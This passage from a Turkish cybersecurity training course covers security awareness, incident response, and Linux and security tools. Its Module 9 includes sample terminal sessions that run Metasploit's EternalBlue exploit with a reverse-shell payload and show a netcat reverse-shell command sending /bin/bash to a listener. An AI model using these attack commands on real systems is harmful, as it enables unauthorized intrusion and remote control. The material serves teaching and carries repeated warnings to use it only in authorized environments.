Modül 2’deki Truva Atı ve solucan gibi zararlı türleri; bu riskin mantığını açıklar.
Modül 7’deki “sınırlama” yaklaşımı; şüpheli medya temasında cihazı izole etmeye giden refleksin temelidir.

8.2 Tailgating: Fiziksel Güvenlik ve Sosyal Mühendislik Kesişimi

Tailgating, yetkisiz bir kişinin “kapıyı tutma” gibi iyi niyetli davranışlarla fiziksel alana sızmasıdır. Fiziksel erişim, dijital kontrolleri anlamsızlaştırabilecek kadar güçlü sonuçlar doğurabilir. Örneğin Tanımadığınız birinin “kartımı unuttum” diyerek arkanızdan giriş yapması. Günlük hayatta ofisler, veri merkezleri, ortak çalışma alanları.

9) Zero Trust ve En Az Yetki: Günlük Hayata Uyarlanmış Güvenlik Prensipleri

9.1 Sıfır Güven (Zero Trust): “Asla Güvenme, Her Zaman Doğrula”

Zero Trust, ağın içinde bile her erişim isteğinin doğrulanmasını savunur. “İçerisi güvenlidir” varsayımı, modern tehditlerde geçerliliğini yitirir. Örneğin Hesap girişlerinde MFA kullanmak ve her oturumda anomali kontrolü yapmak. Günlük hayatta kurumsal erişim politikaları, çok faktörlü doğrulama sistemleri.

9.2 En Az Yetki (Least Privilege)

Kullanıcıya sadece işini yapması için gereken minimum yetkinin verilmesi. Yetki fazlalığı, ele geçirilen hesabın etkisini büyütür. Örneğin Günlük işler için yönetici ayrıcalığı kullanmamak; gerekmeyen erişimleri kapatmak. Günlük hayatta kurumsal IAM politikaları, dosya paylaşım izinleri.

Not: Modül 3’teki yetkilendirme mantığı ve Modül 6’daki uyum yaklaşımıyla doğrudan ilişkilidir.

10) Kişisel Olay Müdahale Mini Planı: Bir Şey Olursa Ne Yapacağım?

Modül 7’deki olay yönetimi akışı bireysel ölçekte sadeleştirilir.

10.1 Şüpheli Durumda İlk Adımlar (Kontrol Listesi)

Olay refleksi; panik yerine sıralı ve kayıtlı hareket etmektir. Yanlış adımlar (kanıtı bozma, kontrolsüz paylaşım, acele karar) zararı büyütür. Örneğin Şüpheli giriş bildirimi aldınız: önce hesabı güvene alın, sonra kapsamı kontrol edin. Günlük hayatta şüpheli oturum uyarıları, cihaz kaybı, beklenmedik işlem bildirimi.

Önerilen akış:

1. Sınırlama: Şüpheli oturumu kapat, parolayı değiştir, mümkünse tüm cihazlardan çıkış yap.

2. Güçlendirme: MFA etkinleştir/yenile; kurtarma bilgilerini güncelle.

3. Kapsam kontrolü: Aynı e-posta/parola kullanılan diğer kritik hesaplardan başlayarak parolaları değiştir.

4. Kayıt: Ne zaman fark ettin? Hangi belirti vardı? Ne yaptın? Kısa not tut.

5. Kontrollü iletişim: Resmi destek kanallarına başvur; finansal risk varsa bankayı resmi kanaldan ara.

10.2 Kanıt ve Kayıt Disiplini (Incident Journal) + Maskeleme (Redaction)

Kanıt; olayı anlamaya yarayan bilgi; olay günlüğü; zaman çizelgesi ve aksiyon kaydıdır. Redaction, paylaşım öncesi hassas bilgiyi maskelemedir. Stres altında unutma olur; yazılı kayıt doğruluğu ve tutarlılığı artırır. Örneğin Şüpheli e-posta geldi: gönderen adresi, tarih/saat, konu ve attığınız adımı kaydedin; ekran görüntüsü paylaşacaksanız gereksiz kişisel verileri gizleyin. Günlük hayatta destek talepleri, hesap kurtarma süreçleri, uyuşmazlıklar.

Modül 6’daki “doğru iletişim ve gizlilik” ilkesi; olay sırasında da geçerlidir.

11) Kişisel Güvenlik Planı: Sürdürülebilir 15 Dakika Rutini

Bu bölüm, modülün tüm kazanımlarını tek bir uygulanabilir plana bağlar.

11.1 Haftalık/Kısa Periyotlu Kontroller

• Ana e-posta ve kritik hesaplar: MFA açık mı, kurtarma bilgileri güncel mi?

• Kullanılmayan hesaplar: kapatılabilir mi, parola/izinleri güçlendirilebilir mi?

• Cihaz güncellemeleri: bekleyen güncelleme var mı?

• Yedekleme: son yedek ne zaman, geri yükleme denendi mi?

• Paylaşım kontrolü: son paylaşımlarda aşırı bilgi var mı? (oversharing)

11.2 Günlük Davranış Kuralları (Dijital Hijyen)

Mini özet: Bu plan, Modül 3–4–5’in teknik temellerini “alışkanlığa”, Modül 6’nın veri/etik çerçevesini “davranış disiplinine”, Modül 7’nin olay yönetimini “doğru reflekslere” dönüştürür.

Terimler Sözlüğü (Glossary)

Bu Modülde Neler Öğrendik?

• Güvenlik farkındalığının teknik önlemler kadar davranış disiplinine dayandığını ve insan faktörünün kritik olduğunu öğrendik.

• CIA üçlüsünü günlük kararlarla ilişkilendirerek “hangi davranış hangi etkiyi doğurur?” bakışını geliştirdik.

• En yaygın hataları sistematik biçimde ele aldık: parola tekrarı, güncelleme ihmali, aşırı paylaşım ve bunların sonuçları.

• Hesap güvenliği için uygulanabilir bir plan kurduk: benzersiz parola, parola yöneticisi yaklaşımı, MFA, kurtarma ayarları.

• Cihaz güvenliği hijyenini yapılandırdık: patch yönetimi, izinler, şifreleme, yedekleme ve geri yükleme testi.

• Halka açık ağlarda ortam riskini, MITM mantığını ve doğrulama refleksini güçlendirdik; HTTPS’in sınırlarını öğrendik.

• Sosyal mühendislikte phishing/vishing/smishing sinyallerini tanıyarak “dijital şüphecilik” becerisini geliştirdik.

• Zero Trust ve En Az Yetki prensiplerini günlük hayata uyarlayarak erişim kararlarını daha güvenli hale getirdik.

• Modül 7’deki olay yönetimi disiplinini bireysel mini müdahale planına dönüştürdük: sınırlama, kayıt, doğrulama, kontrollü iletişim.

MODÜL 9 — Linux ve Siber Güvenlik Araçları

Modül Özeti

Bu modül, siber güvenlik pratiğinde en sık kullanılan Linux komutlarını, ağ tarama araçlarını (nmap), Metasploit Framework'ü (msfconsole) ve dosya çalıştırma, hash analizi gibi geniş kapsamlı konuları detaylı örneklerle ele alır.

Modül Amaçları

• Temel Linux komutlarını (whoami, pwd, ls, grep, find, ps, netstat) siber güvenlik senaryolarında uygulayabilir.
• Dosya izinlerini (chmod) ve script çalıştırma yöntemlerini (./, bash, python3) açıklayabilir.
• Nmap ile port taraması ve servis tespiti yapabilir.
• MSFconsole temel komutlarını kullanarak modül arama, yapılandırma ve çalıştırma sürecini anlatabilir.
• Netcat, curl, wget, dig, tcpdump gibi ağ komutlarını uygulayabilir.
• Hash hesaplama (md5sum, sha256sum), strings, xxd, base64 ile dosya analizi yapabilir.

Uyarı: nmap, Metasploit yalnızca yetkili ortamlarda kullanılmalıdır.

9.1) Temel Linux Komutları

Sunucu veya sanal makineye SSH veya konsol ile bağlandığınızda ilk adım, sistemde kim olduğunuzu ve nerede olduğunuzu bilmektir. Olay müdahalesinde "bu sunucuya hangi kullanıcıyla bağlandım?" sorusu kritiktir; yanlış kimlik varsayımı yanlış sonuçlara yol açar. Aşağıdaki komutlar bu bilgiyi sağlar.

9.1.1) Oturum ve Konum Komutları

analyst@prod-server:~$ whoami
analyst

analyst@prod-server:~$ pwd
/home/analyst

analyst@prod-server:~$ hostname
prod-server

analyst@prod-server:~$ id
uid=1000(analyst) gid=1000(analyst) groups=1000(analyst),27(sudo)

Açıklama: whoami yalnızca kullanıcı adını döndürür. id ise uid (kullanıcı kimliği), gid (grup kimliği) ve kullanıcının üye olduğu grupları gösterir. Burada sudo grubuna üyelik, yönetici yetkisiyle komut çalıştırma imkânı verir.

9.1.2) Dizin ve Dosya Komutları

Olay müdahalesinde log dosyaları genellikle /var/log altındadır. ls -la ile gizli dosyalar dahil tüm içeriği, izinleri ve sahiplik bilgisini görürsünüz. tail komutu logların son satırlarını gösterir; saldırı sonrası genelde en son kayıtlar önemlidir. tail -f ile dosyayı canlı takip edebilirsiniz.

analyst@prod-server:~$ cd /var/log

analyst@prod-server:/var/log$ ls -la | head -15
total 1024
drwxr-xr-x 10 root root  4096 Feb 25 02:00 .
drwxr-xr-x 12 root root  4096 Feb 25 01:00 ..
-rw-r-----  1 root adm  2048 Feb 25 02:15 auth.log
-rw-r-----  1 root adm  8192 Feb 25 02:14 syslog
-rw-r--r--  1 root root  256 Feb 25 01:00 boot.log
-rw-r--r--  1 root root 4096 Feb 25 02:10 kern.log
...

analyst@prod-server:/var/log$ tail -n 5 auth.log
Feb 25 02:12:40 prod-server sshd[1231]: Failed password for invalid user admin from 192.168.1.100
Feb 25 02:12:44 prod-server sshd[1232]: Failed password for invalid user root from 192.168.1.100
Feb 25 02:14:01 prod-server sshd[1233]: Accepted password for analyst from 10.0.0.5
Feb 25 02:15:22 prod-server sshd[1234]: Connection closed by 192.168.1.100
Feb 25 02:18:01 prod-server sshd[1235]: Accepted password for analyst from 10.0.0.5

Yorum: auth.log SSH giriş denemelerini kaydeder. "Failed password for invalid user admin" satırı, 192.168.1.100 IP'sinden admin kullanıcısıyla yapılan başarısız denemeyi gösterir. Bu tipik bir brute-force saldırısı işaretidir.

9.1.3) Arama ve Filtreleme — grep ve find

grep metin içinde kalıp arar; log analizinde en sık kullanılan komuttur. grep -r dizinlerde özyinelemeli arama yapar. find ise dosya adına veya özelliklerine göre dosya arar; örneğin /tmp altındaki tüm .sh uzantılı dosyaları bulmak şüpheli script tespitinde işe yarar.

analyst@prod-server:/var/log$ grep "Failed password" auth.log
Feb 25 02:12:40 prod-server sshd[1231]: Failed password for invalid user admin from 192.168.1.100
Feb 25 02:12:44 prod-server sshd[1232]: Failed password for invalid user root from 192.168.1.100
Feb 25 02:10:15 prod-server sshd[1228]: Failed password for analyst from 192.168.1.100
...

analyst@prod-server:/var/log$ grep "Failed password" auth.log | wc -l
47

analyst@prod-server:~$ find /tmp -name "*.sh" -mmin -60
/tmp/suspicious_script.sh

Açıklama: grep "Failed password" auth.log | wc -l toplam 47 başarısız SSH denemesi olduğunu gösterir. find /tmp -name "*.sh" -mmin -60 son 60 dakikada değiştirilmiş .sh dosyalarını listeler — olay sonrası şüpheli script aramada kullanılır.

9.1.4) Sistem Bilgisi — ps, netstat

ps aux çalışan tüm süreçleri listeler; zararlı veya beklenmeyen bir proses olup olmadığını kontrol etmek için kullanılır. netstat -tulpn dinleyen portları ve hangi programın dinlediğini gösterir; backdoor veya beklenmeyen bir servisin açık olup olmadığını anlamak için kritiktir.

analyst@prod-server:~$ ps aux | grep -E "sshd|nginx"
root      1234  0.0  0.1  12345  1234 ?  Ss  Feb24  0:00 /usr/sbin/sshd -D
root      1235  0.0  0.2  23456  2345 ?  S   Feb25  0:01 nginx: master process
analyst   1236  0.0  0.1  23457  1234 ?  S   Feb25  0:00 nginx: worker process

analyst@prod-server:~$ netstat -tulpn 2>/dev/null | head -12
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address  Foreign Address  State    PID/Program
tcp        0      0 0.0.0.0:22    0.0.0.0:*       LISTEN   1234/sshd
tcp        0      0 0.0.0.0:80    0.0.0.0:*       LISTEN   1235/nginx
tcp        0      0 0.0.0.0:443   0.0.0.0:*       LISTEN   1235/nginx
tcp        0      0 127.0.0.1:3306 0.0.0.0:*      LISTEN   1001/mysqld

Yorum: Port 22 (SSH), 80 ve 443 (web), 3306 (MySQL, sadece localhost) açık. Beklenmeyen bir port (ör. 4444, 1337) görürseniz şüpheli olabilir.

9.2) Dosya Çalıştırma ve İzinler

Linux'ta her dosyanın okuma (r), yazma (w) ve çalıştırma (x) izinleri vardır. Bir script veya binary'yi çalıştırmak için o dosyada çalıştırma (execute) izni olması gerekir. chmod komutu bu izinleri değiştirir. chmod +x tüm kullanıcılara çalıştırma izni verir; chmod 755 ise sahibe rwx (okuma-yazma-çalıştırma), gruba ve diğerlerine rx (okuma-çalıştırma) verir — genelde scriptler için kullanılır. Rakamlar: r=4, w=2, x=1. Örn: 7=4+2+1=rwx.

analyst@kali:~/scripts$ ls -l scan.sh
-rw-r--r-- 1 analyst analyst 256 Feb 25 10:00 scan.sh

# Çalıştırma izni yok (x yok). Önce chmod +x ile izin verelim.

analyst@kali:~/scripts$ chmod +x scan.sh

analyst@kali:~/scripts$ ls -l scan.sh
-rwxr-xr-x 1 analyst analyst 256 Feb 25 10:00 scan.sh

analyst@kali:~/scripts$ ./scan.sh
Tarama başlatılıyor...
Port 22 (SSH)  : AÇIK
Port 80 (HTTP) : AÇIK
Port 443 (HTTPS): AÇIK
Tarama tamamlandı.

# x izni olmadan bash ile çalıştırma (scripti bash'e argüman olarak veriyoruz)
analyst@kali:~$ bash /tmp/analiz.sh
Analiz başladı...

# Python scripti çalıştırma
analyst@kali:~$ python3 exploit.py 192.168.1.10
[*] Hedef: 192.168.1.10
[*] Port taraması yapılıyor...
[+] Port 445 açık (SMB)

Not: source script.sh veya . script.sh scripti mevcut kabukta çalıştırır; değişkenler kalır. Ortam yapılandırması için kullanılır (örn. source .env).

9.3) Nmap ile Ağ Tarama

Nmap (Network Mapper), ağ keşfi ve port taramasında en yaygın kullanılan araçtır. Açık portları, çalışan servisleri, sürüm bilgilerini ve bazen işletim sistemini tespit eder. Penetrasyon testinin "keşif" aşamasında kritik rol oynar. Önemli: Nmap yalnızca izin aldığınız ağlarda kullanılmalıdır; yetkisiz tarama birçok ülkede suçtur.

analyst@kali:~$ nmap 192.168.1.100
Starting Nmap 7.94 ( https://nmap.org ) at 2025-02-25 10:30 UTC
Nmap scan report for 192.168.1.100
Host is up (0.0023s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  ssl/http

Nmap done: 1 IP address (1 host up) scanned in 2.45 seconds

analyst@kali:~$ nmap -sV -p 22,80,443 192.168.1.100
Starting Nmap 7.94 ( https://nmap.org ) at 2025-02-25 10:32 UTC
Nmap scan report for 192.168.1.100
Host is up (0.0018s latency).
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.5
80/tcp  open  http     nginx 1.18.0 (Ubuntu)
443/tcp open  ssl/http nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Yorum: -sV ile OpenSSH 8.2p1, nginx 1.18.0 gibi sürüm bilgileri alındı. Bu bilgi, bilinen zafiyetleri araştırmak için kullanılır.

analyst@kali:~$ nmap -sn 192.168.1.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2025-02-25 10:35 UTC
Nmap scan report for 192.168.1.1
Host is up (0.0012s latency).
Nmap scan report for 192.168.1.100
Host is up (0.0021s latency).
Nmap scan report for 192.168.1.105
Host is up (0.0018s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 4.12 seconds

Açıklama: -sn sadece hangi IP'lerin canlı olduğunu tespit eder; port taraması yapmaz. Alt ağı keşfetmek için kullanılır.

9.4) MSFconsole — Metasploit Framework

Metasploit Framework, zafiyet tarama, exploit geliştirme ve penetrasyon testinde kullanılan güçlü bir araçtır. msfconsole ile interaktif konsola girilir. Exploit'ler "module" olarak organize edilir; önce search ile arama yapılır, sonra use ile modül seçilir, set ile parametreler atanır ve run veya exploit ile çalıştırılır. Uyarı: Yalnızca yetkili penetrasyon testi ortamlarında kullanın.

analyst@kali:~$ msfconsole
...
msf6 >

msf6 > search eternalblue
Matching Modules
================
#  Name                                      Disclosure Date  Rank
-  ----                                      ---------------  ----
0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       normal
1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal

msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] Using configured payload windows/x64/meterpreter/reverse_tcp

msf6 exploit(ms17_010_eternalblue) > show options
Module options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  RHOSTS                     yes       The target address
  RPORT     445              yes       The SMB service port

Payload options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  LHOST                     yes       The listen address
  LPORT     4444             yes       The listen port

msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.10
RHOSTS => 192.168.1.10

msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.100
LHOST => 192.168.1.100

msf6 exploit(ms17_010_eternalblue) > run
[*] 192.168.1.10:445 - Connecting to target for exploitation...
[*] 192.168.1.10:445 - Sending stage...
[*] Meterpreter session 1 opened

Açıklama: RHOSTS hedef IP, LHOST sizin (saldırgan makinenin) IP'si — reverse shell için dinleme adresi. EternalBlue, Windows SMB zafiyetidir; yalnızca yamalanmamış sistemlerde çalışır.

9.5) Ağ ve Veri Komutları

Bu komutlar HTTP istekleri göndermek, dosya indirmek, bağlantı dinlemek, DNS sorgulamak ve paket yakalamak için kullanılır. Penetrasyon testinde ve olay müdahalesinde sıkça ihtiyaç duyulur.

analyst@kali:~$ curl -I https://example.com
HTTP/2 200
content-encoding: gzip
accept-ranges: bytes
age: 601646
cache-control: max-age=604800
content-type: text/html; charset=UTF-8
...

analyst@kali:~$ dig example.com +short
93.184.216.34

analyst@kali:~$ wget -q https://example.com -O - | head -5
<!doctype html>
<html>
<head>
    <title>Example Domain</title>

# Dinleyici taraf (saldırgan makine): Port 4444'ü dinler
analyst@kali:~$ nc -lvp 4444
listening on [any] 4444 ...

# Hedef makinede (başka terminal): Bağlantı kurulduğunda bash yönlendirilir
# nc 192.168.1.100 4444 -e /bin/bash

# Basit bağlantı testi
analyst@kali:~$ nc -zv 192.168.1.1 80
Connection to 192.168.1.1 80 port [tcp/http] succeeded!

Not: nc -zv hedef port portun açık olup olmadığını hızlıca kontrol eder.

9.6) Hash ve Dosya Analizi

Malware analizi, dosya bütünlüğü kontrolü ve forensik incelemede hash hesaplama ve metin çıkarma kritik adımlardır. sha256sum ile dosyanın benzersiz parmak izi alınır; bu değer VirusTotal gibi servislerde aranarak bilinen zararlı olup olmadığı kontrol edilir. strings dosyadan okunabilir karakter dizilerini çıkarır; URL, parola veya IP gibi şüpheli kalıplar tespit edilebilir. xxd hex dump verir; binary dosyanın yapısını incelemek için kullanılır.

analyst@kali:~$ file /tmp/unknown
/tmp/unknown: ELF 64-bit LSB executable, x86-64

analyst@kali:~$ sha256sum /tmp/unknown
a1b2c3d4e5f6789012345678901234567890abcdef1234567890abcdef123456  /tmp/unknown

analyst@kali:~$ strings /tmp/unknown | grep -iE "http|pass|192\.|10\.|/bin/"
http://192.168.1.100:8080/callback
password=admin123
/bin/bash
/bin/sh

Yorum: strings çıktısında şüpheli URL, parola veya kabuk yolu görülüyorsa dosya malware olabilir. Hash değeri VirusTotal'da aranmalıdır.

analyst@kali:~$ echo "SEBS" | base64
U0VCUw==

analyst@kali:~$ echo "U0VCUw==" | base64 -d
SEBS

analyst@kali:~$ echo -n "test" | xxd
00000000: 7465 7374                                test

analyst@kali:~$ lsof -i :4444
COMMAND  PID   USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
nc       5432  analyst  3u  IPv4  12345      0t0  TCP *:4444 (LISTEN)

analyst@kali:~$ kill -9 5432

analyst@kali:~$ pkill -f "suspicious_script"
# İsme göre proses sonlandırma

Modül 9 — Sözlük

Modül 9 — Değerlendirme

1. whoami ne yapar? — Oturum kullanıcısını gösterir.
2. nmap -sV ne işe yarar? — Servis sürümü tespiti.
3. chmod +x ne yapar? — Çalıştırma izni verir.
4. MSFconsole'da modül seçmek için? — use
5. sha256sum ne için? — Dosya hash hesaplama.

Bu Modülde Neler Öğrendik?

• Temel Linux komutlarını siber güvenlik senaryolarında kullandık.
• Dosya izinleri ve çalıştırma yöntemlerini öğrendik.
• Nmap ile port taraması yaptık.
• MSFconsole temel komutlarını gördük.
• Netcat, curl, wget, dig, tcpdump tanıdık.
• Hash hesaplama, strings, xxd ile dosya analizi yaptık.
• Araçların yalnızca yetkili ortamlarda kullanılması gerektiğini vurguladık.